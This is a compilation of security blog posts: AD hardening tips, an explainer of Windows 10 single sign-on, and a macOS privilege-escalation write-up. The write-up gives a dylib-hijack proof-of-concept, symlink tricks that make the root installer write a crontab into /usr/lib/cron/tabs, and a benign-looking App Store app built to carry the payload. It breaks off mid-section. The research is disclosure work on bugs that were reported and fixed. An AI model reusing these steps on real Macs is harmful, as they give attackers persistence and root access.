    • Keep track of servers especially domain servers which are being used to develop products.
    • Do not deploy servers without checking for weak credentials.
    • There was no reason for the domain user to be a local administrator on that server.
• There is no need for a user belonging to the domain admins group to log in to any domain machine to perform daily administrative tasks.
    • Always Delegate control and follow the least privilege model.
• Frequent password rotation for high-privileged users helps.

    Credits –
    Mukunda – https://twitter.com/_m3rcii

    Manideep – https://twitter.com/mani0x00

     


     

Source: https://wesecureapp.com/2019/05/31/exploiting-un-attended-web-servers-to-get-domain-admin-red-teaming/

  11. How SSO works in Windows 10 devices

Posted on November 8, 2016 by Jairo

    In a previous post I talked about the three ways to setup Windows 10 devices for work with Azure AD. I later covered in detail how Azure AD Join and auto-registration to Azure AD of Windows 10 domain joined devices work, and in an extra post I explained how Windows Hello for Business (a.k.a. Microsoft Passport for Work) works. In this post I will cover how Single Sign-On (SSO) works once devices are registered with Azure AD for domain joined, Azure AD joined or personal registered devices via Add Work or School Account.

    SSO in Windows 10 works for the following types of applications:

    1. Azure AD connected applications, including Office 365, SaaS apps, applications published through the Azure AD application proxy and LOB custom applications integrating with Azure AD.
    2. Windows Integrated authentication apps and services.
    3. AD FS applications when using AD FS in Windows Server 2016.

     

    The Primary Refresh Token

    SSO relies on special tokens obtained for each of the types of applications above. These are in turn used to obtain access tokens to specific applications. In the traditional Windows Integrated authentication case using Kerberos, this token is a Kerberos TGT (ticket-granting ticket). For Azure AD and AD FS applications we call this a Primary Refresh Token (PRT). This is a JSON Web Token containing claims about both the user and the device.

    The PRT is initially obtained during Windows Logon (user sign-in/unlock) in a similar way the Kerberos TGT is obtained. This is true for both Azure AD joined and domain joined devices. In personal devices registered with Azure AD, the PRT is initially obtained upon Add Work or School Account (in a personal device the account to unlock the device is not the work account but a consumer account e.g. hotmail.com, live.com, outlook.com, etc.).

The PRT is needed for SSO. Without it, the user will be prompted for credentials every time they access applications. Please also note that the PRT contains information about the device. This means that if you have any device-based conditional access policy set on an application, access will be denied without the PRT.

     

    PRT validity

    The PRT has a validity of 90 days with a 14 day sliding window. If the PRT is constantly used for obtaining tokens to access applications it will be valid for the full 90 days. After 90 days it expires and a new PRT needs to be obtained. If the PRT has not been used in a period of 14 days, the PRT expires and a new one needs to be obtained. Conditions that force expiration of the PRT outside of these conditions include events like user’s password change/reset.

For domain joined and Azure AD joined devices, renewal of the PRT is attempted every 4 hours. This means that on the first sign-in/unlock at least 4 hours after the PRT was obtained, Windows attempts to obtain a new PRT.

Now, there is a caveat for domain joined devices. Attempting to get a new PRT only happens if the device has line of sight to a DC (for a Kerberos full network logon, which also triggers the Azure AD logon). This is a behavior we want to change and hope to address in the next update of Windows; that would mean the PRT can be updated even if the user goes off the corporate network. The implication of this behavior today is that a domain joined device needs to come onto the corporate network (either physically or via VPN) at least once every 14 days.

     

    Domain joined/Azure AD joined devices and SSO

     

    The following step-by-step shows how the PRT is obtained and how it is used for SSO. The diagram shows the flow in parallel to the long standing Windows Integrated authentication flow for reference and comparison.

    sso-in-windows-10

     

(1) User enters credentials in the Windows Logon UI

    In the Windows Logon UI the user enters credentials to sign-in/unlock the device. The credentials are obtained by a Credential Provider. If using username and password the Credential Provider for username and password is used, if using Windows Hello for Business (PIN or bio-gesture), the Credential Provider for PIN, fingerprint or face recognition is used.

    credprov

     

    (2) Credentials are passed to the Cloud AP Azure AD plug-in for authentication

The Credential Provider passes the credentials to Winlogon, which will call the LsaLogonUser() API with the user credentials (to learn about the authentication architecture in Windows, see Credentials Processes in Windows Authentication). The credentials get to a new component in Windows 10 called the Cloud Authentication Provider (Cloud AP). This is a plug-in based component running inside the LSASS (Local Security Authority Subsystem) process, with one plug-in being the Azure AD Cloud AP plug-in. For simplicity, these two are shown as one Cloud AP box in the diagram.

The plug-in will authenticate the user against Azure AD and AD FS (if Windows Server 2016) to obtain the PRT. The plug-in knows about the Azure AD tenant and the presence of AD FS from the information cached during device registration. I explain this at the end of step #2 in the post Azure AD Join: what happens behind the scenes? when the information from the ID Token is obtained and cached just before performing registration (the explanation applies both to domain joined devices registered with Azure AD and to Azure AD joined devices).

     

    (3) Authentication of user and device to get PRT from Azure AD (and AD FS if federated and version of Windows Server 2016)

    Depending on what credentials are used the plug-in will obtain the PRT via distinct calls to Azure AD and AD FS.

    PRT based in username and password

    To obtain the Azure AD PRT using username and password, the plug-in will send the credentials directly to Azure AD (in a non-federated configuration) or to AD FS (if federated). In the federated case, the plug-in will send the credentials to the following WS-trust end-point in AD FS to obtain a SAML token that is then sent to Azure AD.

    adfs/services/trust/13/usernamemixed

    Note: This post has been updated to reflect that the end-point used is the usernamemixed and not the windowstransport as it was previously stated.

Azure AD will authenticate the user with the credentials obtained (non-federated) or by verifying the SAML token obtained from AD FS (federated). After authentication, Azure AD will build a PRT with both user and device claims and return it to Windows.

    PRT based in the Windows Hello for Business credential

    To obtain the Azure AD PRT using the Windows Hello for Business credential, the plug-in will send a message to Azure AD to which it will respond with a nonce. The plug-in will respond with the nonce signed with the Windows Hello for Business credential key.

    Azure AD will authenticate the user by checking the signature based on the public key that it registered at credential provisioning as explained in the post Azure AD and Microsoft Passport for Work in Windows 10 (please note that Windows Hello for Business is the new name for Microsoft Passport for Work). The PRT will contain information about the user and the device as well, however a difference with the PRT obtained using username and password is that this one will contain a “strong authentication” claim.

    "acr":"2"

     

    Regardless of how the PRT was obtained, a session key is included in the response which is encrypted to the Kstk (one of the keys provisioned during device registration as explained in step #4 in the post Azure AD Join: what happens behind the scenes?).

The session key is decrypted by the plug-in and imported to the TPM using the Kstk. Upon re-authentication, the PRT is sent over to Azure AD signed with a derived version of the previously imported session key stored in the TPM, which Azure AD can verify. This way we are binding the PRT to the physical device, reducing the risk of PRT theft.

     

    (4) Cache of the PRT for the Web Account Manager to access it during app authentication

Once the PRT is obtained, it is cached in the Local Security Authority (LSA). It is accessible by the Web Account Manager, which is also a plug-in based component that provides an API for applications to get tokens from a given Identity Provider (IdP). It can access the PRT through the Cloud AP (which has access to the PRT), which checks for a particular application identifier for the Web Account Manager. There is a plug-in for the Web Account Manager that implements the logic to obtain tokens from Azure AD and AD FS (if AD FS in Windows Server 2016).

    You can see whether a PRT was obtained after sign-in/unlock by checking the output of the following command.

    dsregcmd.exe /status

    Under the ‘User State’ section check the value for AzureAdPrt which must be YES.

    prtindsregcmd
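From memory, the relevant part of the dsregcmd.exe /status output looks roughly like this (abridged; treat the exact formatting as approximate):

+----------------------------------------------------------------------+
| User State                                                           |
+----------------------------------------------------------------------+
                 AzureAdPrt : YES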

    A value of NO will indicate that no PRT was obtained. The user won’t have SSO and will be blocked from accessing service applications that are protected using device-based conditional access policy.

     

    A note on troubleshooting

Troubleshooting why the PRT is not obtained could be a topic for a full post; however, one test you can do is to check whether that same user can authenticate to Office 365 (say, via browser to SharePoint Online) from a domain joined computer without being prompted for credentials. If the UPN suffix of users in Active Directory on-premises doesn't route to the verified domain (alternate login ID), please make sure you have the appropriate issuance transform rule(s) in AD FS for the ImmutableID claim.

One other reason I have seen for the PRT not being obtained is when the device has a bad transport key (Kstk). I have seen this in devices that were registered on a very early version of Windows (which eventually upgraded to 1607). As the PRT is protected using a key in the TPM, this could be why the PRT is not obtained at all. One remediation for this case is to reset the TPM and let the device register again.

     

    (5, 6 and 7) Application requests access token to Web Account Manager for a given application service

When a client application connects to a service application that relies on Azure AD for authentication (for example, the Outlook app connecting to Office 365 Exchange Online), the application will request a token from the Web Account Manager using its API.

    The Web Account Manager calls the Azure AD plug-in which in turn uses the PRT to obtain an access token for the service application in question (5).

There are two interfaces in particular that are important to note. One permits an application to get a token silently: it will use the PRT to obtain an access token silently if it can. If it can't, it will return a code to the caller application telling it that UI interaction is required. This could happen for multiple reasons, including an expired PRT or a requirement for MFA. Once the caller application receives this code, it can call a separate API that will display a web control for the user to interact with.

    WinRT API

    WebAuthenticationCoreManager.GetTokenSilentlyAsync(...) // Silent API
    WebAuthenticationCoreManager.RequestTokenAsync(...) // User interaction API

    Win32 API

    IWebAuthenticationCoreManagerStatics::GetTokenSilentlyAsync(...) // Silent API
    IWebAuthenticationCoreManagerInterop::RequestTokenForWindowAsync(...) // UI API

     

    After returning the access token to the application (6), the client application will use the access token to get access to the service application (7).

     

    Browser SSO

When the user accesses a service application via Microsoft Edge or Internet Explorer, the application will redirect the browser to the Azure AD authentication URL. At this point, the request is intercepted via URLMON and the PRT gets included in the request. After authentication succeeds, Azure AD sends back a cookie that will contain SSO information for future requests. Please note that support for Google Chrome has been available since the Creators Update of Windows 10 (version 1703) via the Windows 10 Accounts Google Chrome extension.

    Note: This post has been updated to state the support for Google Chrome in Windows 10.

     

    Final thoughts

    Remember that registering your domain joined computers with Azure AD (i.e. becoming Hybrid Azure AD joined) will give you instant benefits and it is likely you have everything you need to do it. Also, if you are thinking in deploying Azure AD joined devices you will start enjoying some additional benefits that come with it.

Please let me know your thoughts and stay tuned for other posts related to device-based conditional access and other related topics.

    See you soon,

    Jairo Cadena (Twitter: @JairoC_AzureAD)

     

Source: https://jairocadena.com/2016/11/08/how-sso-works-in-windows-10-devices/

  12. macOS - Getting root with benign AppStore apps

     June 1, 2019  24 minutes read
     BLOG
     macos • vulnerability • lpe

This writeup is intended to be a bit of storytelling. I would like to show how I went down the rabbit hole in a quick 'research' project I wanted to do, and eventually found a local privilege escalation vulnerability in macOS. I also want to tell about all the obstacles and failures I ran into, the stuff people don't usually talk about, but which I feel is part of the process all of us go through when we try to create something.

If you prefer to watch this as a talk, you can see it here: Csaba Fitzl - macOS: Gaining root with Harmless AppStore Apps - SecurityFest 2019 - YouTube

    Slides are here: Getting root with benign app store apps

    DYLIB Hijacking on macOS

    This entire story started with me trying to find dylib hijacking vulnerability in a specific application, which I can’t name here. Well, I didn’t find any in that app, but found plenty in many others.

    If you are not familiar with dylib hijacking on macOS, read Patrick Wardle’s great writeup: Virus Bulletin :: Dylib hijacking on OS X or watch his talk on the subject: DEF CON 23 - Patrick Wardle - DLL Hijacking on OS X - YouTube

    I would go for the talk, as he is a great presenter, and will explain the subject in a very user friendly way, so you will understand all the details.

But just to sum it up here very shortly, there are 2 types of dylib hijacking possible:

1. Weak loading of dylibs - in this case the OS uses the LC_LOAD_WEAK_DYLIB load command, and if the dylib is not found, the application will still run and won't error out. So if there is an app that refers to a missing dylib with this method, you can go ahead, place yours there, and profit.
2. Run-path dependent (rpath) dylibs - in this case the dylibs are referenced with the @rpath prefix, which is resolved relative to the running location of the Mach-O file, and the loader will try to find the dylibs along the configured search paths. It's useful if you don't know where your app will end up after installation. Developers can specify multiple search paths, and if the first one (or first few) doesn't exist, you can place your malicious dylib there, as the loader will search through these paths in sequential order. In its logic this is similar to classic DLL hijacking on Windows.

    Finding vulnerable apps

It couldn't be easier: download Patrick's DHS tool, run the scan, and wait. Link: Objective-See. There is also a command line version: GitHub - synack/DylibHijack: python utilities related to dylib hijacking on OS X

For the walkthrough I will use the Tresorit app as an example, as they have already fixed the problem - and big kudos to them, as they not only responded but also fixed this within a couple of days after reporting. I will not mention all of the apps here, but you would be amazed how many are out there.

    image1

    The vulnerability is with Tresorit’s FinderExtension:

    /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension

    And you can place your dylib here:

    rpath vulnerability: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/Frameworks/UtilsMac.framework/Versions/A/UtilsMac

    DHS will only show you the first hijackable dylib, but there can be more. Set the DYLD_PRINT_RPATHS variable to 1 in Terminal, and you will see which dylibs the loader tries to load. You can see below that we can hijack two dylibs.

    $ export DYLD_PRINT_RPATHS="1"
    $ 
    $ /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension
    RPATH failed to expanding     @rpath/UtilsMac.framework/Versions/A/UtilsMac to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../Frameworks/UtilsMac.framework/Versions/A/UtilsMac
    RPATH successful expansion of @rpath/UtilsMac.framework/Versions/A/UtilsMac to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac
    RPATH failed to expanding     @rpath/MMWormhole.framework/Versions/A/MMWormhole to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../Frameworks/MMWormhole.framework/Versions/A/MMWormhole
    RPATH successful expansion of @rpath/MMWormhole.framework/Versions/A/MMWormhole to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/MMWormhole.framework/Versions/A/MMWormhole
    Illegal instruction: 4
    $ 

Additionally, it's a good idea to double check whether the app is compiled with the library-validation option (flag=0x200). That would mean that the OS will verify whether all loaded dylibs are properly signed, so you can't just create anything and use it. Most apps are not compiled this way, including Tresorit (but they promised to fix it):

    $ codesign -dvvv /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension
    Executable=/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension
    Identifier=com.tresorit.mac.TresoritExtension.FinderExtension
    Format=bundle with Mach-O thin (x86_64)
    CodeDirectory v=20200 size=754 flags=0x0(none) hashes=15+5 location=embedded
    (...)

    Utilizing the vulnerability

    It’s also something that is super easy based on the talk above, but here it is in short. I made the following POC:

    #include <stdio.h>
    #include <stdlib.h>
    #include <syslog.h>
    
    __attribute__((constructor))
    void customConstructor(int argc, const char **argv)
     {
         printf("Hello World!\n");
         system("/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal");
         syslog(LOG_ERR, "Dylib hijack successful in %s\n", argv[0]);
    }

The constructor will be called upon loading the dylib. It will print a line, create a syslog entry, and also start Terminal for you. If the app doesn't run in a sandbox, you get a full-featured Terminal. Compile it:

    gcc -dynamiclib hello.c -o hello-tresorit.dylib -Wl,-reexport_library,"/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac"

    Then run Patrick’s fixer script. It will fix the dylib version for you (the dylib loader will verify that when loading) and also will add all the exports that are exported by the original dylib. Those exports will actually point to the valid dylib, so when the application loads our crafted version, it can still use all the functions and won’t crash.

    python2 createHijacker.py hello-tresorit.dylib "/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac"
    CREATE A HIJACKER (p. wardle)
    configures an attacker supplied .dylib to be compatible with a target hijackable .dylib
    
     [+] configuring hello-tresorit.dylib to hijack UtilsMac
     [+] parsing 'UtilsMac' to extract version info
         found 'LC_ID_DYLIB' load command at offset(s): [2568]
         extracted current version: 0x10000
         extracted compatibility version: 0x10000
     [+] parsing 'hello-tresorit.dylib' to find version info
         found 'LC_ID_DYLIB' load command at offset(s): [888]
     [+] updating version info in hello-tresorit.dylib to match UtilsMac
         setting version info at offset 888
     [+] parsing 'hello-tresorit.dylib' to extract faux re-export info
         found 'LC_REEXPORT_DYLIB' load command at offset(s): [1144]
         extracted LC command size: 0x48
         extracted path offset: 0x18
         computed path size: 0x30
         extracted faux path: @rpath/UtilsMac.framework/Versions/A/UtilsMac
     [+] updating embedded re-export via exec'ing: /usr/bin/install_name_tool -change
     [+] copying configured .dylib to /Users/csaby/Downloads/DylibHijack/UtilsMac

    Once that is done, you can just copy the file over and start the app.

    Other apps

Considering the number of vulnerable apps, I didn't take the time to report all of these issues, only a few. Besides Tresorit, I reported one to Avira, who promised a fix but with low priority, as you need root to utilise this. The others were in MS Office 2016, where Microsoft said they don't consider this a security bug since you need root privileges to exploit it; they said I could submit it as a product bug. I don't agree, because this is a way to achieve persistence, but I suppose I have to live with it.

    The privilege problem

    My original ‘research’ was done, but this is the point where I went beyond what I expected in the beginning.

There is a problem in the case of many apps: in theory you just need to drop your dylib into the right place, but there are two main scenarios in terms of the privileges required for utilising the vulnerability.

1. The application folder is owned by your account (in reality, everyone is an admin on their own Mac, so I won't deal with standard users here) - in that case you can go and drop your files easily.
2. The application folder is owned by root, so you need root privileges in order to perform the attack. Honestly, this makes it less interesting, because if you can get root you can set up much better persistence elsewhere, and the app will typically run in a sandbox under the user's privileges, so you won't get too much out of it. It's still a problem, but a less interesting one.

Typically, applications you drag and drop into the /Applications directory fall into the first category. All applications from the App Store fall into the second category, because they are installed by the installd daemon, which runs as root. Apps that you install from a package typically also fall into the second category, as those usually require privilege elevation.

I wasn't quite happy with all the vendor responses, and also didn't like that exploitation is limited to root most of the time, so I started to think: can we bypass root folder permissions? Spoiler: YES, otherwise this would be a very short post. :)

    Tools for monitoring

    Before moving on, I want to mention a couple of tools, that I found useful for event monitoring.

    FireEye - Monitor.app

This is a procmon-like app created by FireEye; it can be downloaded from here: Monitor.app | Free Security Software | FireEye It's quite good!

    image2

    Objective-See’s ProcInfo library & ProcInfoExample

This is an open source library for monitoring process creation and termination on macOS. I used the demo project of this library, called ProcInfoExample. It's a command line utility and will log every process creation with all the related details, like arguments, signature info, etc. Its output looks like:

    2019-03-11 21:18:05.770 procInfoExample[32903:4117446] process start:
    pid: 32906
    path: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/efw_cache_update
    user: 0
    args: (
        "/System/Library/PrivateFrameworks/PackageKit.framework/Resources/efw_cache_update",
        "/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/BC005493-3176-43E4-A1F0-82D38C6431A3.activeSandbox/Root/Applications/Parcel.app"
    )
    ancestors: (
        9103,
        1
    )
     signing info: {
        signatureAuthorities =     (
            "Software Signing",
            "Apple Code Signing Certification Authority",
            "Apple Root CA"
        );
        signatureIdentifier = "com.apple.efw_cache_update";
        signatureSigner = 1;
        signatureStatus = 0;
    }
     binary:
    name: efw_cache_update
    path: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/efw_cache_update
    attributes: {
        NSFileCreationDate = "2018-11-30 07:31:32 +0000";
        NSFileExtensionHidden = 0;
        NSFileGroupOwnerAccountID = 0;
        NSFileGroupOwnerAccountName = wheel;
        NSFileHFSCreatorCode = 0;
        NSFileHFSTypeCode = 0;
        NSFileModificationDate = "2018-11-30 07:31:32 +0000";
        NSFileOwnerAccountID = 0;
        NSFileOwnerAccountName = root;
        NSFilePosixPermissions = 493;
        NSFileReferenceCount = 1;
        NSFileSize = 43040;
        NSFileSystemFileNumber = 4214431;
        NSFileSystemNumber = 16777220;
        NSFileType = NSFileTypeRegular;
    }
    signing info: (null) 

    Built-in fs_usage utility

The fs_usage utility can monitor file system events in great detail, I would say even too much detail; you need to do some good filtering if you want to get useful data out of it. You get something like this:

    (standard input):21:27:01.229709  getxattr               [ 93]           /Applications/Parcel.app                                                                                                                                              0.000017   lsd.4123091
    (standard input):21:27:01.229719  access                       (___F)    /Applications/Parcel.app/Contents                                                                                                                                     0.000005   lsd.4123091
    (standard input):21:27:01.229819  fstatat64                              [-2]//Applications/Parcel.app                                                                                                                                         0.000013   lsd.4123091
    (standard input):21:27:01.229927  getattrlist                            /Applications/Parcel.app                                                                                                                                              0.000006   lsd.4123091
    (standard input):21:27:01.229933  getattrlist                            /Applications/Parcel.app/Contents                                                                                                                                     0.000006   lsd.4123091
    (standard input):21:27:01.229939  getattrlist                            /Applications/Parcel.app/Contents/MacOS                                                                                                                               0.000005   lsd.4123091
    (standard input):21:27:01.229945  getattrlist                            /Applications/Parcel.app/Contents/MacOS/Parcel                                                                                                                        0.000005   lsd.4123091
    (standard input):21:27:01.229957  getattrlist                            /Applications/Parcel.app                                                                                                                                              0.000005   lsd.4123091

    Bypassing root folder permissions in App Store installed apps

The goal here is to write an arbitrary file inside an App Store installed application, which is by default only writable by root. The bypass will only work if the application has already been installed at least once, since buying an app requires authenticating to the App Store even if it's free (and if the user checked 'Save Password' for free apps, you can get those as well). What I 'noticed' first is that you can create folders in the /Applications folder - obviously, as you can also drag and drop apps there. But what happens if I create folders for the to-be-installed app? Here is what happens, and the steps to bypass the root folder permissions:

    1. Before you delete the app take a note of the folder structure - you have read access to that. This is just for knowing what to recreate later.
2. Start Launchpad, locate the app, and delete it if it is currently installed. Interestingly, it will remove the application even though you interact with Launchpad as a normal user. Note that it can only do that for apps installed from the App Store.
3. Create the folder structure with your regular ID in the /Applications folder; you can do that without root access. It's enough to create the folders you need (no need for all of them) and place your dylib (or whatever you want) there.
    4. Go back to the AppStore and on the Purchased tab, locate the app, and install it. You don’t need to authenticate in this case. You can also use the command line utility available from Github: GitHub - mas-cli/mas: Mac App Store command line interface

    At this point the app will be installed and you can use it, and you have your files there, which you couldn’t place there originally without root permissions.
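A minimal sketch of the flow, using a hypothetical Example.app, dylib name, and App Store ID (all three are placeholders; mas is the third-party CLI mentioned above):

mkdir -p "/Applications/Example.app/Contents/Frameworks"    # no root needed
cp evil.dylib "/Applications/Example.app/Contents/Frameworks/Evil.dylib"
mas install 123456789    # reinstall by numeric App Store ID; installd (root) installs around our files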

    This was fixed in Mojave 10.14.5, I will talk about that later.

To compare, it's like having write access to the “Program Files” folder on Windows. Admin users do have it, but only when running at HIGH integrity, which means you need to bypass UAC from the default MEDIUM integrity mode. However, on Windows, MEDIUM integrity admin to HIGH integrity admin elevation is not a security boundary, while on macOS, admin to root is a boundary.

    Taking it further - Dropping AppStore files anywhere

At this point I had another idea. Since installd runs as root, can we use it to place the app, or certain parts of it, somewhere else? The answer is YES. Let's say I want to drop the app's main Mach-O file in a folder where only root has access, e.g. /opt (folders protected by SIP, like /System, won't work, as even root doesn't have access there). Here are the steps to reproduce it (steps 1-2 are the same as in the previous case):

3. Create the following folder structure: /Applications/Example.app/Contents
4. Create a symlink 'MacOS' pointing to /opt: ln -s /opt /Applications/Example.app/Contents/MacOS - the main Mach-O file typically lives in /Applications/Example.app/Contents/MacOS, and in our case we now point this to /opt.
5. Install the app.

What happens at this point is that the app will install normally, except that any files under /Applications/Example.app/Contents/MacOS will go to /opt. If there was a file with the name of the Mach-O file, it will be overwritten. Essentially, what we can achieve with this is to drop any file found in an App Store app to a location we control.

    What can’t we do? (Or at least I didn’t find a way)

    1. Change the name of the file being dropped; in other words, put the contents of one file into another one with a different name. If we create a symlink for the actual mach-o file, like ln -s /opt/myname /Applications/Example.app/Contents/MacOS/Example, the symlink will simply be overwritten when the installd daemon moves the file from the temporary location to the final one. You can observe the same behaviour if you experiment with the mv command:

      $ echo aaa > a
      $ ln -s a b
      $ ls -la
      total 8
      drwxr-xr-x   4 csaby  staff   128 Sep 11 16:16 .
      drwxr-xr-x+ 50 csaby  staff  1600 Sep 11 16:16 ..
      -rw-r--r--   1 csaby  staff     4 Sep 11 16:16 a
      lrwxr-xr-x   1 csaby  staff     1 Sep 11 16:16 b -> a
      $ cat b
      aaa
      $ echo bbb >> b
      $ cat b
      aaa
      bbb
      $ touch c
      $ ls -l
      total 8
      -rw-r--r--  1 csaby  staff  8 Sep 11 16:16 a
      lrwxr-xr-x  1 csaby  staff  1 Sep 11 16:16 b -> a
      -rw-r--r--  1 csaby  staff  0 Sep 11 16:25 c
      $ mv c b
      $ ls -la
      total 8
      drwxr-xr-x   4 csaby  staff   128 Sep 11 16:25 .
      drwxr-xr-x+ 50 csaby  staff  1600 Sep 11 16:16 ..
      -rw-r--r--   1 csaby  staff     8 Sep 11 16:16 a
      -rw-r--r--   1 csaby  staff     0 Sep 11 16:25 b
      2. Even if we create a hardlink instead of a symlink, it will be overwritten, just like in the first case.
      3. As noted earlier, we can't write to folders protected by SIP.

      Ideas for using this for privilege escalation

      Based on the above, I had the following ideas for privilege escalation from admin to root:

      1. Find a file in the App Store that has the same name as a process that runs as root, and replace that file.
      2. Find a file in the App Store that contains a cron job line and is named "root"; you could drop that into /usr/lib/cron/tabs.
      3. If you don't find one, you can potentially create a totally harmless app that gives you an interactive prompt or something similar, and upload it to the App Store (it should pass Apple's vetting process, as it does nothing harmful). For example, your file could contain an example root crontab file which starts Terminal every hour; you could place that in the crontab folder.
      4. Make a malicious dylib, upload it as part of an app to the App Store, and drop it so that an app running as root will load it.

      Reporting to Apple

      I will admit that at this point I took the lazy approach and reported the above to Apple, mainly because:

      • I found it very unlikely that I would find a suitable file satisfying either #1 or #2
      • Xcode almost satisfied #2, as it has some cron examples, but none named root
      • I had zero experience in developing App Store apps, and I couldn't code in either Objective-C or Swift
      • I had better things to do at work and after work :)

      So I reported it, and at one point Apple came back regarding my privilege escalation ideas: "The App Review process helps prevent malicious applications from becoming available on the Mac and iOS App Stores."

      Obviously Apple didn't understand the problem at first; either it was my fault for not explaining it properly, or they simply misunderstood it. It was clear that there was a misunderstanding between us, so I felt I had to prove my point if I wanted this fixed. So I took a deep breath, went with the "Try Harder" approach, and decided to develop an app and submit it to the App Store.

      Creating an App

      After some thinking, I decided that I would create an application that has a crontab file for root, and drop that file into the /usr/lib/cron/tabs folder. The app had to do something meaningful in order to be submitted and accepted, so I came up with the idea of a cronjob editor app. It's genuinely useful, and it would also explain why I have crontab files embedded. Here is my journey:

      Apple developer ID

      In order to submit any app to the store, you have to sign up for the developer program. I signed up for the Apple developer program with a new Apple ID, simply because I feared they would ban me once I introduced an app that can be used for privilege escalation. In fact, they didn't. It costs $99/year.

      Choosing a language

      I had no prior knowledge of either Objective-C or Swift, but looking at the following Obj-C syntax freaked me out:

      myFraction = [[Fraction alloc] init];

    This is how you call methods of objects and pass parameters. It goes against every syntax I have ever known, and I just didn't want to digest it. So I looked at Swift, which looked much nicer in this regard, and decided to go with that. :)

    Learning Swift

    My company has a subscription to one of the big online training portals, where I found a short, few-hour-long introductory course on Cocoa app development with Swift. It was an interesting course, and it turned out to be sufficient: basically, it covered how to put together a simple window-based GUI. It also turned out that there are Swift 1, 2, 3, and 4, as the language has evolved and the syntax has changed a bit over time, so you need to pick the right training.

    Publishing to the store - The Process

    1. Become an Apple Developer, costs 99$/year
    2. Login to App Store Connect and create a Bundle ID: https://developer.apple.com/account/mac/identifier/bundle/create image3

    3. Go back and create a new App referring the Bundle ID you created: https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/ng/app image4

    4. Populate the details (license page, description, etc…)

    5. Upload your app from Xcode

    6. Populate more details if needed

    7. Submit for review

    Publishing to the store - The error problem

    Developing the app was pretty quick, but publishing it was really annoying, because I really wanted to see that my idea indeed worked. Once I pushed it, I had to wait ~24 hours for it to be reviewed. I was really impatient and nervous about whether I could truly make it to the store :) The clock ticked, and it was rejected! :( The reason was that when I clicked the close button, the app didn't exit, and the user had no way to bring back the window. I fixed it, resubmitted, and waited another ~24 hours. Approved!

    I quickly went to the store, prepared the exploit, and clicked install. Meanwhile, during development, I had upgraded myself to Mojave and never really did any other tests with other apps. So it was really embarrassing to notice that on Mojave this exploit path doesn't work :( No problem, I have a High Sierra VM, let's install it there! There I got a popup that the minimum version required for the app is 10.14 (Mojave), and I can't put it on HS… :( Damn, it's an easy fix, but that meant resubmitting again and waiting another ~24 hours. Finally it got approved again, and the exploit worked on High Sierra! :)

    It was a really annoying process, as every time I made a small mistake, fixing it meant 24 hours, even if the actual fix in the code took one minute.

    The App

    The application I developed is called "Crontab Creator", and it is actually very useful for creating crontab files. It's still there and available, and as it turns out, there are a few people using it: Crontab Creator on the Mac App Store

    image5

    The application is absolutely benign! However, it contains various examples of crontab files, which are all stored as separate files within the application. The only reason I didn't embed the strings in the source code is to be able to use the files for exploitation :) Among these there is one called 'root', which will try to execute a script from the /Applications/Scripts folder.

    Privilege Escalation on High Sierra

    The Crontab Creator app contains a file named 'root' as an example crontab file, along with 9 others. Its content is the following:

    * * * * * /Applications/Scripts/backup-apps.sh

    Obviously this script doesn't exist by default, but you can easily create it in the /Applications folder, as you have write access, and at that point you can put anything you want into it.

    The steps for the privilege escalation are as follows. First we need to create the app folder structure, and place a symlink there.

    cd /Applications/
    mkdir "Crontab Creator.app"
    cd Crontab\ Creator.app/
    mkdir Contents
    cd Contents/
    ln -s /usr/lib/cron/tabs/ Resources

    Then we need to create the script file, which will be run every minute; I chose to start Terminal.

    cd /Applications/
    mkdir Scripts
    cd Scripts/
    echo /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal > backup-apps.sh
    chmod +x backup-apps.sh

    Then we need to install the application from the store. We can do this either via the GUI, or we can do it via the CLI if we install brew, and then mas.

    Commands:

    /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
    brew install mas
    mas install 1438725196

    In summary: utilizing the previous vulnerabilities, we drop the 'root' file into the crontab folder and create the script that starts Terminal, and within a minute we get a popup and root access.

    The fix

    As noted before, Apple fixed this exploit path in Mojave. This was in October 2018; my POC didn't work anymore, and without further testing I honestly thought that the privilege escalation issue was fixed - yes, you could still drop files inside the app, but I assumed the symlink issue was solved. I couldn't have been more wrong! But that turned out only later.

    Infecting installers without breaking the Application’s signature

    In the next part, we want to bypass root folder permissions for manually installed apps. We can't do a true bypass / privilege escalation here, as during the installation the user has to enter his/her password, but we can still apply the previous idea. However, here I want to show another method: how to embed our custom file into an installer package. If we can MITM a pkg download, we could replace it with our own, or we can simply deliver it to the user via email or similar.

    As a side note, interestingly, App Store apps are downloaded over HTTP. You can't really alter them, though, as the hash is downloaded via HTTPS and the signature is also verified.

    Here are the steps to include your custom file in a valid package:

